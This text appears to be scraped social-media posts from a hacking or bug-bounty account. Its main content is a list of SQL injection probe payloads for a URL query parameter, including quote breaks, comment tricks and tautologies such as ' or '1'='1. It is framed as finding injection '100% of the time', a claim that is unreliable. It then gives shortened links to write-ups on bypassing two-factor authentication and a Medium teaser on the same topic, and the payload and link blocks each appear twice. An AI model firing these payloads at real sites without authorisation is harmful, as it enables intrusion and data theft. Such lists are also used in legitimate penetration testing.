This is how to find sql-Injection 100% of the time
For http://site.com/?q=HERE
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
For http://site.com/?q=HERE
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
Two Factor Authentication
writeups:- CC @009fal_con
https://t.co/rObGIJy2iA
https://t.co/5WsH8frlur
https://t.co/BxL74qnCqE
https://t.co/VdSeUFZ0Mi
https://t.co/fO8vWjruwy
https://t.co/gDng3cn0hL
https://t.co/3uOLJpJEnU
https://t.co/u49bGQkwvn
https://t.co/XLQtyodYWS
writeups:- CC @009fal_con
https://t.co/rObGIJy2iA
https://t.co/5WsH8frlur
https://t.co/BxL74qnCqE
https://t.co/VdSeUFZ0Mi
https://t.co/fO8vWjruwy
https://t.co/gDng3cn0hL
https://t.co/3uOLJpJEnU
https://t.co/u49bGQkwvn
https://t.co/XLQtyodYWS
Medium
4 Methods to Bypass two factor Authentication
Since the dawn of the World Wide Web, attackers have been involved in discovering techniques to compromise systems. Likewise security…